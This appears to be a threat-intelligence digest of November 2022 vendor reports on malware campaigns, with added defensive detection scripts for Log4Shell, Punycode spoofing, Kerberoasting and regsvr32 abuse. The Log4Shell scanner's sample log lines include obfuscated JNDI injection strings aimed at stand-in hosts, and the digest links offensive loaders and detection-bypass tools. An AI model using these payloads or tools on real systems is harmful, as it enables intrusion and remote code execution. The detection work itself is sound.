#ParsedReport
17-11-2022
Cisco Talos Intelligence Blog. Get a Loda This: LodaRAT meets new friends
https://blog.talosintelligence.com/get-a-loda-this
Actors/Campaigns:
Kasablanka (motivation: cyber_espionage)
Threats:
Lodarat
Redline_stealer
Neshta
Venomrat
S500rat
Beacon
Powershell_keylogger_tool
Hvnc_tool
Upx_tool
Industry:
Financial
Geo:
Ethiopia, Peruvian, China
IOCs:
Hash: 5
File: 4
Path: 1
IP: 2
Domain: 2
Softs:
android, windows media player, telegram
Algorithms:
xor
Functions:
EntryPoint
Languages:
delphi, autoit
Platforms:
x86, x64
Cisco Talos Blog
Get a Loda This: LodaRAT meets new friends
* LodaRAT samples were deployed alongside other malware families, including RedLine and Neshta.
* Cisco Talos identified several variants and altered versions of LodaRAT with updated functionality that have been seen in the wild.
* Changes in these LodaRAT variants…
#ParsedReport
17-11-2022
Alert (AA22-320A)
https://us-cert.cisa.gov/ncas/alerts/aa22-320a
Threats:
Log4shell_vuln
Xmrig_miner
Mimikatz_tool
Dumplsass_tool
Credential_stealing_technique
Kerberoasting_technique
Geo:
Iran, Iranian
CVEs:
CVE-2021-44228 [Vulners]
Vulners: Score: 9.3, CVSS: 4.5,
Vulners: Exploitation: True
X-Force: Risk: 10
X-Force: Patch: Official fix
Soft:
- apache log4j (2.0, 2.0, 2.0, 2.0, <2.15.0, <2.3.1, <2.12.2)
- siemens sppa-t3000 ses3000 firmware (*)
- siemens logo! soft comfort (*)
- siemens spectrum power 4 (4.70, 4.70, <4.70, 4.70)
- siemens siveillance control pro (*)
have more...
TTPs:
Tactics: 8
Technics: 16
IOCs:
File: 14
IP: 4
Domain: 4
Command: 2
Path: 1
Registry: 1
Softs:
vmware horizon, windows defender, psexec, active directory, local security authority, mware horizon se, windows task scheduler, windows registry, microsoft security advisory, windows defender credential guard, have more...
Algorithms:
base64
www.cisa.gov
Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester | CISA
From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch (FCEB) organization where CISA observed suspected advanced persistent threat (APT) activity. In the course of incident response activities…
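The alert above describes Log4Shell (CVE-2021-44228) exploitation against VMware Horizon followed by XMRig and credential theft. As an added example, not code from the CISA alert, here is a small log scanner that catches the JNDI lookup string in web or application logs, including the nested ${lower:...}, ${upper:...} and ${...:-x} lookups attackers wrap around it to defeat a plain grep for "${jndi:". The log lines are constructed, use RFC 5737 addresses, and are not IOCs from the alert.

```python
"""Added example: find Log4Shell (CVE-2021-44228) JNDI lookups in log lines,
including nested-lookup obfuscation. Not code from the CISA alert; the sample
log lines below are constructed for the demo."""
import re
from urllib.parse import unquote

# Innermost ${...} lookup, i.e. one whose body contains no further braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve(match):
    """Collapse the lookups Log4j would evaluate before reaching the JNDI one.

    ${env:NOPE:-j}, ${::-j}, ${:-j}  -> the default value after the last ':-'
    ${lower:J} / ${upper:j}          -> case-folded text
    ${jndi:...} and unknown lookups  -> left untouched
    """
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi"):
        return match.group(0)
    if ":-" in body:
        return body.rsplit(":-", 1)[1]
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    return match.group(0)


def normalize(text):
    """URL-decode, then resolve nested lookups inside-out until a fixed point."""
    text = unquote(text)
    prev = None
    while prev != text:
        prev, text = text, _INNER.sub(_resolve, text)
    return text


def find_jndi(text):
    """Return the de-obfuscated ${jndi:...} payload, or None if the text is clean."""
    m = _JNDI.search(normalize(text))
    return m.group(0) if m else None


def scan(lines):
    """Scan log lines; return (1-based line number, payload) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        payload = find_jndi(line)
        if payload:
            hits.append((n, payload))
    return hits


# Constructed access-log lines: line 1 is benign, lines 2-4 carry payloads
# (plain, URL-encoded, and nested env/lower/upper lookups respectively).
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [17/Nov/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [17/Nov/2022:10:02:15 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [17/Nov/2022:10:03:40 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${lower:L}${lower:D}${upper:a}p://203.0.113.9/x}"',
]

if __name__ == "__main__":
    for n, payload in scan(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

The normaliser only resolves the lookup forms that are well known from in-the-wild payloads; a line with a lookup it does not understand is left as-is rather than guessed at, so the scanner can miss a novel wrapper. Treat it as a triage aid, not as a substitute for patching Log4j to 2.17.1 or later (2.12.4 / 2.3.2 on the older branches).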
#ParsedReport
17-11-2022
DEV-0569 finds new ways to deliver Royal ransomware, various payloads. Detection details
https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads
Actors/Campaigns:
Dev-0569
Dev-0858
Threats:
Royal_ransomware
Disabling_antivirus_technique
Nsudo_tool
Batloader
Teamviewer_tool
Anydesk_tool
Icedid
Vidar_stealer
Gozi
Z_loader
Cobalt_strike
Beacon
Industry:
Financial
IOCs:
Domain: 2
File: 1
Softs:
microsoft defender, microsoft defender for endpoint, microsoft teams, zoom, telegram, microsoft edge, psexec
Algorithms:
aes
Microsoft News
DEV-0569 finds new ways to deliver Royal ransomware, various payloads
DEV-0569’s recent activity shows their reliance on malvertising and phishing in delivering malicious payloads. The group’s changes and updates in delivery and payload led to distribution of info stealers and Royal ransomware.
#ParsedReport
18-11-2022
Emotet's Vacation is Over: No Rest for the Wicked
https://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked
Threats:
Emotet
Industry:
Financial
IOCs:
Hash: 7
IP: 55
Softs:
microsoft office
Algorithms:
zip, base64, ecdsa, ecdh
Win API:
VirtualAlloc
Deep Instinct
Emotet’s Vacation is Over: No Rest for the Wicked | Deep Instinct
Emotet is a prolific malware botnet that originally functioned as a banking trojan when it emerged in 2014. It was spread via spam campaigns, imitating financial statements, transfers, and payment invoices. Emotet is propagated mostly via Office email attachments…
#ParsedReport
18-11-2022
Earth Preta Spear-Phishing Governments Worldwide. Threat hunting
https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
Actors/Campaigns:
Earth_preta (motivation: cyber_espionage)
Red_delta
Threats:
Toneins
Toneshell
Pubload
Dll_sideloading_technique
Putty_tool
Beacon
Cobalt_strike
Plugx_rat
Industry:
Education, Government
Geo:
Usa, Chinese, Myanmar, China, Taiwan, Asia, Philippines, Japan, Australia, Pacific
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 58
Path: 2
Command: 4
Registry: 1
Hash: 96
IP: 7
Email: 14
Softs:
microsoft office, microsoft silverlight, microsoft word
Algorithms:
aes, rc4, xor, zip
Win API:
OpenEventA, GrayStringW, EnumDateFormatsA, LineDDA, GetForegroundWindow, EnumThreadWindows
Links:
https://github.com/mxrch/GHunt
https://github.com/Tai7sy/vs-obfuscation
https://github.com/EricZimmerman/LECmd
Trend Micro
Earth Preta Spear-Phishing Governments Worldwide
#ParsedReport
18-11-2022
HZ RAT goes China. Distribution
https://medium.com/@DCSO_CyTec/hz-rat-goes-china-506854c5f2e2
Threats:
Hzrat
Troldesh
Credential_stealing_technique
Cobalt_strike
Beacon
Geo:
China, Netherlands, Australia, Russia, Spain, Chinese
CVEs:
CVE-2017-11882 [Vulners]
Vulners: Score: 9.3, CVSS: 4.8,
Vulners: Exploitation: True
X-Force: Risk: 7.8
X-Force: Patch: Official fix
Soft:
- microsoft office (2013, 2010, 2016, 2007)
TTPs:
Tactics: 1
Technics: 9
IOCs:
Hash: 226
IP: 22
Url: 3
File: 10
Path: 5
Softs:
puttygen, easyconnect, wechat, google chrome, microsoft edge, mozilla firefox
Algorithms:
zip, aes, base64, xor
Functions:
OpenVPN
YARA: Found
Links:
https://github.com/DCSO/Blog_CyTec/tree/main/2022_11_hz_rat_goes_china/hz_rat_cnc_extractor
https://github.com/DCSO/Blog_CyTec/tree/main/2022_11_hz_rat_goes_china/hz_rat_pcap_decryptor
https://github.com/WaterJuice/WjCryptLib/tree/e39760a85015b88820d7a2de832155a7c8ff2c88
https://github.com/DCSO/Blog_CyTec/tree/main/2022_11_hz_rat_goes_china/yara
https://github.com/DCSO/Blog_CyTec/tree/main/2022_11_hz_rat_goes_china/hz_rat_server_scanner
https://gist.github.com/botlabsDev/e8dee63cb4ab957803492a077da64adf
https://github.com/DCSO/Blog_CyTec/tree/main/2022_11_hz_rat_goes_china
Medium
HZ RAT goes China
Walking down the Royal Road as we did in one of our previous posts, another by-catch of our Yara rule caught our attention. Turns out we…
#ParsedReport
18-11-2022
Alert (AA22-321A)
https://us-cert.cisa.gov/ncas/alerts/aa22-321a
Threats:
Hive
Vssadmin_tool
Industry:
Healthcare, Government, Financial
Geo:
Canada, Australia
CVEs:
CVE-2020-12812 [Vulners]
Vulners: Score: 7.5, CVSS: 2.6,
Vulners: Exploitation: True
X-Force: Risk: 5.3
X-Force: Patch: Official fix
Soft:
- fortinet fortios (<6.2.4, 6.4.0, <6.0.10)
CVE-2021-31207 [Vulners]
Vulners: Score: 6.5, CVSS: 1.7,
Vulners: Exploitation: True
X-Force: Risk: 6.6
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
CVE-2021-42321 [Vulners]
Vulners: Score: 6.5, CVSS: 2.8,
Vulners: Exploitation: True
X-Force: Risk: 8.8
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2016, 2019, 2016, 2019)
CVE-2021-34523 [Vulners]
Vulners: Score: 7.5, CVSS: 3.4,
Vulners: Exploitation: True
X-Force: Risk: 9
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
CVE-2021-34473 [Vulners]
Vulners: Score: 10.0, CVSS: 2.8,
Vulners: Exploitation: True
X-Force: Risk: 9.1
X-Force: Patch: Official fix
Soft:
- microsoft exchange server (2013, 2019, 2016, 2016, 2019)
TTPs:
Tactics: 5
Technics: 10
IOCs:
File: 9
Url: 6
Command: 1
Domain: 4
IP: 24
Softs:
microsoft exchange, microsoft exchange server, windows defender, esxi, microsoft windows defender, bcdedit, active directory
Links:
https://github.com/cisagov/cset/
#ParsedReport
18-11-2022
The Real Cost of Cryptomining: Adversarial Analysis of TeamTNT
https://sysdig.com/blog/real-cost-cryptomining-teamtnt
Actors/Campaigns:
Teamtnt (motivation: cyber_criminal, cyber_espionage, financially_motivated, hacktivism)
Chimaera
Threats:
Hildegard
Xmrig_miner
Xmrigcc_tool
Industry:
Financial, Government
Geo:
Canada, America, Ireland, German, Netherlands, Romania, Germany
Softs:
parrotos, redis, docker, alpine, ubuntu
Links:
https://github.com/xmrig/xmrig-proxy
Sysdig
The Real Cost of Cryptomining: Adversarial Analysis of TeamTNT
Sysdig TRT attributed more than $8,100 worth of cryptocurrency to TeamTNT, costing the victims of cryptomining more than $430,000.
#ParsedReport
18-11-2022
AXLocker, Octocrypt, and Alice: Leading a new wave of Ransomware Campaigns
https://blog.cyble.com/2022/11/18/axlocker-octocrypt-and-alice-leading-a-new-wave-of-ransomware-campaigns
Threats:
Axlocker
Octocrypt
Alice_ransomware
Octo
Upx_tool
Industry:
Government, Financial
Geo:
Singapore, Australia, Georgia, India, Dubai
TTPs:
Tactics: 8
Technics: 13
IOCs:
Url: 1
File: 4
Hash: 8
Softs:
discord, opera, telegram
Algorithms:
aes-256-ctr, aes
Functions:
startencryption
Languages:
golang
Platforms:
intel
#ParsedReport
18-11-2022
Disneyland Malware Team: It's a Puny World After All
https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all
Actors/Campaigns:
Disneyland_team
Threats:
Gozi
Industry:
Financial
Geo:
Dubai, Russia, Emirates
IOCs:
Domain: 6
Url: 4
Krebs on Security
Disneyland Malware Team: It’s a Puny World After All
A financial cybercrime group calling itself the Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non…
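The Krebs write-up above turns on Punycode lookalike domains. As an added example, not code from the article, here is a triage script that decodes xn-- labels back to what the browser displays, flags a label that mixes Latin and Cyrillic letters, and folds a small hand-picked subset of Unicode confusables (UTS #39) to test whether the displayed name collapses onto a protected brand. Brand names, hostnames and the confusable table are constructed for the demo; the article's actual domains are not reproduced.

```python
"""Added example: triage hostnames for Punycode/IDN homograph spoofing of a brand.
Not code from the Krebs article; brands, hostnames and the confusable table are
constructed (the table is a hand-picked subset of Unicode UTS #39 confusables)."""
import unicodedata

# Hypothetical brands to protect; a real deployment loads the organisation's own list.
BRANDS = {"citybank", "ameribank"}

# Cyrillic letters that render like Latin ones in most fonts (subset of UTS #39).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04cf": "l",
    "\u0501": "d", "\u051b": "q", "\u0455": "s",
}


def decode_host(host):
    """Turn xn-- (Punycode) labels back into the Unicode the browser would display."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            label = label[4:].encode("ascii").decode("punycode")
        labels.append(label)
    return ".".join(labels)


def scripts(label):
    """Set of Unicode scripts (LATIN, CYRILLIC, ...) used by the letters in a label."""
    found = set()
    for ch in label:
        name = unicodedata.name(ch, "")
        if ch.isalpha() and name:
            found.add(name.split()[0])
    return found


def skeleton(label):
    """Fold confusable letters and strip accents so lookalikes compare equal to the brand."""
    folded = "".join(CONFUSABLES.get(ch, ch) for ch in label)
    decomposed = unicodedata.normalize("NFKD", folded)
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def assess(host):
    """Return the decoded host plus two independent signals worth alerting on."""
    decoded = decode_host(host)
    label = decoded.split(".")[0]        # registrable label for these demo domains
    mixed = len(scripts(label)) > 1      # Latin + Cyrillic in one label is never legitimate
    skel = skeleton(label)
    match = skel if skel in BRANDS and skel != label else None
    return {"host": host, "decoded": decoded, "mixed_script": mixed, "brand_match": match}


# Constructed hostnames in the ASCII (xn--) form they appear in logs and URLs.
SAMPLE_HOSTS = [
    "citybank.example",                                         # the real brand, clean
    "cityb\u0430nk.example".encode("idna").decode("ascii"),     # Cyrillic 'a' swapped in
    "m\u00fcnchen.example".encode("idna").decode("ascii"),      # legitimate single-script IDN
]

if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        print(assess(h))
```

The mixed-script check is the cheap, high-precision signal; the skeleton comparison is what catches a label that is entirely Cyrillic but visually identical to the brand, which the script test alone would pass. Extend CONFUSABLES from the full UTS #39 data before relying on it against anything but this demo.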
#technique
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
https://github.com/capt-meelo/laZzzy
GitHub
GitHub - capt-meelo/laZzzy: laZzzy is a shellcode loader, developed using different open-source libraries, that demonstrates different…
laZzzy is a shellcode loader, developed using different open-source libraries, that demonstrates different execution techniques. - capt-meelo/laZzzy
#technique
Relaying to AD Certificate Services over RPC
https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/
#technique
Titan is a User Defined Reflective DLL (URDLL) that uses a combination of techniques to achieve initial execution and maintain shell stability for Cobalt Strike in a modern endpoint-detection-and-response-heavy environment.
https://github.com/SecIdiot/titan
#technique
A simple PoC to invoke an encrypted shellcode by using a hidden call.
https://github.com/enkomio/BrokenFlow
GitHub
GitHub - enkomio/BrokenFlow: A simple PoC to invoke an encrypted shellcode by using a hidden call
A simple PoC to invoke an encrypted shellcode by using a hidden call - enkomio/BrokenFlow
#technique
Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
https://github.com/trustedsec/orpheus
GitHub
GitHub - trustedsec/orpheus: Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types
Bypassing Kerberoast Detections with Modified KDC Options and Encryption Types - trustedsec/orpheus
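The repository title says Kerberoast detections keyed on KDC options and encryption types can be bypassed. As an added example, not code from orpheus or from the CISA alert AA22-320A above, the block contrasts an encryption-type rule with a volume rule over Windows Security Event 4769 (TGS request) records: the first fires only on RC4 tickets (TicketEncryptionType 0x17), the second on one principal requesting many distinct SPNs in a short window, which does not depend on the ticket's encryption type or on the KDC options in the request. Events, account names and the 60-second / 5-SPN thresholds are constructed for the demo.

```python
"""Added example: two Kerberoasting detections over Event 4769 records.
Rule A keys on the RC4 etype classic Kerberoasting produces; rule B counts
distinct SPNs per requester in a time window and survives an attacker choosing
AES or unusual KDC options. Not code from orpheus or CISA; events are constructed."""
from collections import defaultdict
from datetime import datetime

RC4_HMAC = "0x17"            # TicketEncryptionType values per Microsoft's 4769 documentation
AES_ETYPES = {"0x11", "0x12"}


def _roastable(event):
    """Service tickets for krbtgt or machine accounts are not Kerberoast targets."""
    svc = event["ServiceName"]
    return not (svc.endswith("$") or svc.lower() == "krbtgt")


def etype_rule(events):
    """Rule A: any RC4 service ticket for a user-account SPN."""
    return [e for e in events if _roastable(e) and e["TicketEncryptionType"] == RC4_HMAC]


def burst_rule(events, window_s=60, threshold=5):
    """Rule B: one (requester, source IP) pulling >= threshold distinct SPNs within window_s."""
    groups = defaultdict(list)
    for e in events:
        if _roastable(e):
            groups[(e["TargetUserName"], e["IpAddress"])].append(e)
    hits = []
    for (user, ip), evs in groups.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        times = [datetime.fromisoformat(e["TimeCreated"]) for e in evs]
        for i, t0 in enumerate(times):              # sliding window starting at each event
            spns = {evs[j]["ServiceName"] for j in range(i, len(evs))
                    if (times[j] - t0).total_seconds() <= window_s}
            if len(spns) >= threshold:
                hits.append({"user": user, "ip": ip, "distinct_spns": len(spns)})
                break
    return hits


def _ev(ts, user, svc, etype, ip="10.1.2.3"):
    """Build a minimal 4769 record with the fields the rules use."""
    return {"TimeCreated": ts, "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "TicketOptions": "0x40810000", "IpAddress": ip}


# Constructed events: jdoe pulls six SPNs in 30 s, only one of them RC4; asmith is normal use.
SAMPLE_EVENTS = [
    _ev("2022-11-18T09:00:01", "jdoe@CORP.EXAMPLE", "svc_sql", RC4_HMAC),
    _ev("2022-11-18T09:00:05", "jdoe@CORP.EXAMPLE", "svc_web", "0x12"),
    _ev("2022-11-18T09:00:09", "jdoe@CORP.EXAMPLE", "svc_backup", "0x12"),
    _ev("2022-11-18T09:00:14", "jdoe@CORP.EXAMPLE", "svc_sccm", "0x12"),
    _ev("2022-11-18T09:00:20", "jdoe@CORP.EXAMPLE", "svc_jira", "0x12"),
    _ev("2022-11-18T09:00:31", "jdoe@CORP.EXAMPLE", "svc_ci", "0x12"),
    _ev("2022-11-18T09:00:40", "jdoe@CORP.EXAMPLE", "krbtgt", "0x12"),
    _ev("2022-11-18T09:05:00", "asmith@CORP.EXAMPLE", "svc_web", "0x12", ip="10.1.2.9"),
    _ev("2022-11-18T09:05:02", "asmith@CORP.EXAMPLE", "WS01$", "0x12", ip="10.1.2.9"),
]

if __name__ == "__main__":
    print("rule A:", [e["ServiceName"] for e in etype_rule(SAMPLE_EVENTS)])
    print("rule B:", burst_rule(SAMPLE_EVENTS))
```

Rule A sees one of jdoe's six requests; rule B sees the whole burst. In a real estate the volume threshold needs tuning against service accounts and monitoring tools that legitimately enumerate SPNs, and the two rules are best run together rather than either alone.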
#ParsedReport
18-11-2022
Netskope Threat Coverage: Prestige Ransomware
https://www.netskope.com/blog/netskope-threat-coverage-prestige-ransomware
Actors/Campaigns:
Dev-0960
Sandworm
Threats:
Prestige_ransomware
Hermeticwiper
Vssadmin_tool
Blackcat
Lockbit
Industry:
Logistic, Transport
Geo:
Ukraine, Russian, Ukrainian, Poland
IOCs:
Path: 7
Command: 1
File: 2
Softs:
windows registry, mssql windows service, mssql, psexec
Algorithms:
aes, lzma, bzip, zipx
Win Services:
MSSQLSERVER
YARA: Found
SIGMA: Found
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Prestige
https://github.com/SigmaHQ/sigma
Netskope
Netskope Threat Coverage: Prestige Ransomware
Summary In October 2022, a novel ransomware named Prestige was found targeting logistics and transportation sectors in Ukraine and Poland. According to
#ParsedReport
18-11-2022
Securonix Threat Labs Security Advisory: Qbot/QakBot Malware's New Initial Execution Uses Grifted Regsvr32 Binary to Run DLL Payload
https://www.securonix.com/blog/qbot-qakbot-malwares-new-initial-execution
Actors/Campaigns:
Steep_maverick
Threats:
Qakbot
TTPs:
Tactics: 2
Technics: 3
IOCs:
Path: 3
File: 7
Command: 1
Hash: 6
Softs:
sysinternals
Algorithms:
zip
Win API:
WmiCreateProcess
Securonix
Securonix Threat Labs Security Advisory: Qbot/QakBot Malware’s New Initial Execution Uses Grifted Regsvr32 Binary to Run DLL Payload
Explore the latest analysis of QakBot malware using obfuscated Regsvr32 binaries to evade detection and infect systems.
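The advisory above says QakBot's initial execution runs its DLL through a "grifted" Regsvr32 binary. As an added example, not code from the Securonix advisory, here is a process-creation check over Sysmon Event ID 1 style fields that flags a binary whose version resource says REGSVR32.EXE but whose on-disk name differs (the assumption here is that a "grifted" regsvr32 is a copy of regsvr32.exe running under another name), and flags regsvr32 registering a module out of a user-writable directory. Events, paths and file names are constructed.

```python
"""Added example: flag Regsvr32 abuse in process-creation telemetry (Sysmon Event ID 1 fields).
Assumes a 'grifted' regsvr32 is a renamed copy; not code from the Securonix advisory.
All events below are constructed."""
import ntpath
import re

# Directories an unprivileged user can write to (constructed, extend for your estate).
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\|[a-z]:\\programdata\\|[a-z]:\\windows\\temp\\)", re.IGNORECASE)
# Absolute Windows paths in a command line, quoted (may contain spaces) or bare.
PATH_TOKEN = re.compile(r'"([a-z]:\\[^"]+)"|([a-z]:\\\S+)', re.IGNORECASE)


def module_args(cmdline, image):
    """Absolute paths passed as arguments, excluding the image itself."""
    paths = [q or bare for q, bare in PATH_TOKEN.findall(cmdline)]
    return [p for p in paths if p.lower() != image.lower()]


def assess(event):
    """Return the list of reasons this process-creation event is suspicious (empty if none)."""
    image = event["Image"]
    is_regsvr32 = event.get("OriginalFileName", "").upper() == "REGSVR32.EXE"
    reasons = []
    if not is_regsvr32:
        return reasons
    if ntpath.basename(image).lower() != "regsvr32.exe":
        reasons.append(f"renamed regsvr32 (OriginalFileName mismatch): {image}")
    for path in module_args(event["CommandLine"], image):
        if USER_WRITABLE.search(path):
            reasons.append(f"module loaded from user-writable path: {path}")
    return reasons


def scan(events):
    """Index and reasons for every suspicious event."""
    return [(i, assess(e)) for i, e in enumerate(events) if assess(e)]


# Constructed events: 0 is benign vendor install, 1 a renamed copy running a .dat from
# AppData, 2 the real regsvr32 registering a DLL from Downloads, 3 an unrelated process.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"Image": r"C:\Users\bob\AppData\Roaming\Adobe\upd.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"C:\Users\bob\AppData\Roaming\Adobe\upd.exe /s C:\Users\bob\AppData\Roaming\Adobe\img.dat"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": r"regsvr32 /s C:\Users\bob\Downloads\invoice.dll"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe C:\Users\bob\Downloads\notes.txt"},
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(i, reasons)
```

OriginalFileName comes from the PE version resource, so it survives a rename but not a deliberately patched binary; pair this with a hash allow-list of the signed regsvr32.exe versions in your estate if you need to catch the latter.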
#ParsedReport
21-11-2022
ViperSoftX: Hiding in System Logs and Spreading VenomSoftX. Campaign overview
https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/?utm_source=rss&utm_medium=rss&utm_campaign=vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx
Threats:
Vipersoftx
Venomsoftx
Cyberchef_tool
Kraken
Industry:
Financial
Geo:
Italy, Usa, India
IOCs:
File: 3
Path: 8
Url: 2
Domain: 5
Hash: 16
Coin: 17
Softs:
adobe illustrator, corel video studio, microsoft office, task scheduler, chrome, opera, coinbase
Algorithms:
cbc, base64, aes, exhibit
Languages:
javascript, python
Links:
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/list_of_locations.txt
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/VenomSoftX_address_book.txt
https://github.com/avast/ioc/blob/master/ViperSoftX/
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/extraction_script
https://github.com/avast/ioc/blob/master/ViperSoftX/wallets.csv
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/extraction_script/extract_files.py
https://github.com/avast/ioc/blob/master/ViperSoftX/extras/list_of_keywords.txt
Gendigital
ViperSoftX: Hiding in System Logs and Spreading VenomSoftX
Unveiling the Stealth Tactics of ViperSoftX Malware
#ParsedReport
21-11-2022
Mustang Panda Claimloader. China-based Mustang Panda runs targeted attacks with the "Claimloader" malware; Japan may also be affected
https://www.lac.co.jp/lacwatch/report/20221117_003189.html
Actors/Campaigns:
Red_delta
Threats:
Claimloader
Dll_sideloading_technique
Accevent_tool
Meterpreter_tool
Cobalt_strike
Plugx_rat
Antidebugging_technique
Industry:
Government
Geo:
Myanmar, Chinese, Philippine, Philippines, Asian, Japanese, Thailand, Japan
IOCs:
File: 5
Hash: 14
IP: 6
Softs:
task scheduler
Algorithms:
aes
Win API:
MessageBox
LAC Co., Ltd.
China-based Mustang Panda runs targeted attacks with the "Claimloader" malware; Japan may also be affected | LAC WATCH
We have confirmed new activity by the attacker group known as Mustang Panda, based in the Chinese-speaking region, that appears to target Philippine government organizations or related organizations. The attack used an archive file disguised as a document related to the Japan-US-Philippines trilateral meeting.
#ParsedReport
21-11-2022
Brute Ratel C4 Badger. Analysis of the Brute Ratel C4 Badger in real-world use, and its detection
https://mp.weixin.qq.com/s/Nnag6DSf_wx2YrnTXEwNug
Actors/Campaigns:
Duke
Threats:
Brc4_tool
Cobalt_strike
Beacon
Blackbasta
Sliver_tool
Metasploit_tool
Empire_loader
Industry:
Financial
Geo:
Guangdong
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 4
Softs:
esxi
Algorithms:
base64, ror13, rc4
Functions:
C4
Win API:
NtAllocateVirtualMemory, NtProtectVirtualMemory, NtCreateThreadEx, NtWaitForSingleObject, NtCreateSection, NtMapViewOfSection, RtlExitUserThread, WaitForSingleObject
YARA: Found